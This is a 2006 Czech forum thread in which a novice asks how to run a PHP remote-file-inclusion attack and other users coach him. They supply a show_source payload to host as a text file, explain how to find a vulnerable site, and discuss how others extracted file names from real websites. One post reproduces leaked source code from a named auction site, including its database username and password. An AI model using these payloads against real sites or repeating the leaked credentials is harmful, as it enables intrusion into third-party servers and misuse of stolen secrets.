| NO chtel sem se zeptat jakej by mel bejt postup při aplikování injekce napsal jsem so souboru script.txt tento script show_source("ramme.php") ramme jsem napsal protože se tak jemnuje jejich hlavní stránka a melo by mi to vypsat co nikdy jsem to nedelal tak nevim...asi bych vam tu mel nechat jeste linku
[link] nevim přesně co by se tam melo zobrazit tak mi napiste jestli to mam dobra nebo spatne a v cem spociva ta chyba..dikys (odpovědět) | php injekce | 11.6.2006 13:50 |
|
|
|
| a do toho TXTaku si napisal aj <?php ?:D
----------
Who is Tyler Durden ? (odpovědět) | ChreNik | | 225233783 | 11.6.2006 13:58 |
|
|
|
| Chlape... Ta stránka kterou si uvedl neobsahuje include ale rám... :) Najdi si jinou stránku, protože vždy, když se ti zobrazí zdroják a neprovede se, není to include :) (odpovědět) | |
|
|
| Přiznám se: tu stránku jsem taky kdysi zkoušel... (odpovědět) | |
|
|
| Jinak přesně jak řekl ChreNik: do toho script3.txt dej:
<?
show_source("index.php")
?> (odpovědět) | |
|
|
|
|
| jeste se zeptam jinak jakkym scriptem docilily toho že se jim na teto starnce zobrazilo toto
<?php
$SQL_Server = "localhost";
$SQL_Uzivatel = "aukce-burza.cz";
$SQL_Heslo = "jetingue";
$Databaze = "aukce-burza_cz";
$pripoj=MySQL_Connect($SQL_Server, $SQL_Uzivatel, $SQL_Heslo) or Die(MySQL_Error());
MySQL_Select_Db($Databaze) or Die(MySQL_Error());
$set = @mysql_query ('SET NAMES CP1250');
?>
<?php
error_reporting(0);
Function Title(){
$a = $_REQUEST['a'];
if ($a == null) print "";
else print " - $a";}
?>
jakym scriptem toho docilili (odpovědět) | |
|
|
| No právě tou funkcí
show_source()
Akorát musíš najít správný web, chápeš? (odpovědět) | |
|
|
| no jasne ale skusil jsem to na tom co je v users textu v tom komentari je link jemu se to tam zobrazilo ale me ne (odpovědět) | |
|
|
| [link]
koukni a rekni kde je chyba ja myslim ze nikde jedine ze by to tam uz nikdo zaplatoval (odpovědět) | |
|
|
| V tom svym souboru scriptik.txt musis mit nasledujici kod:
<?php
show_source("index.php");
?>
...a nauc se PHP, jinak je to o nicem. (odpovědět) | Emkei | | | | 11.6.2006 14:30 |
|
|
|
| jo jasne diky.jeste bych se chtel zeptat na to jak prisel studna na tohle
<?php
show_source('nastaveni.php');
na tenhle nazev nastaveni
show_source('seo.inc'); a co přesne znamena seo.inc co to je za soubory kde vykomal ty jmena nebo spis jak
?>
(odpovědět) | |
|
|
| jo vpohode uz vim kde to vzal vsechno spociva v zakladnim scriptiku a potom se to odnej jen odviji jasne dik za pomoc (odpovědět) | |
|
|
| show_source('seo.inc'); jen ješte tohle to vubec nechapu jak na to prisel ja sem se tm koukal a seo.inc sem z toho nevykoukal jedine ze by to bylo neco spojeneho s php...lol budu se muset pustit do uceni.. (odpovědět) | |
|
|
| Predpokladam ze inc je zkratka z include, a jedna se nejspise jen o dalsi includovany soubor. Pokud se mylim tak me opravdne, v php nejsem moc zbehly.
----------
public static void main(String args[]){
throw new UnsupportedOperationException("Not implemented!");
}
(odpovědět) | |
|
|
| Podle nazvu toho scriptu (seo.inc) a funkce Title() se IMHO jedna pouze o script na zvyseni page ranku, cehoz lze podle SEO dosahnout tim, ze kazda stranka bude mit jiny titulek, nic vic... (odpovědět) | Emkei | | | | 11.6.2006 23:11 |
|
|
|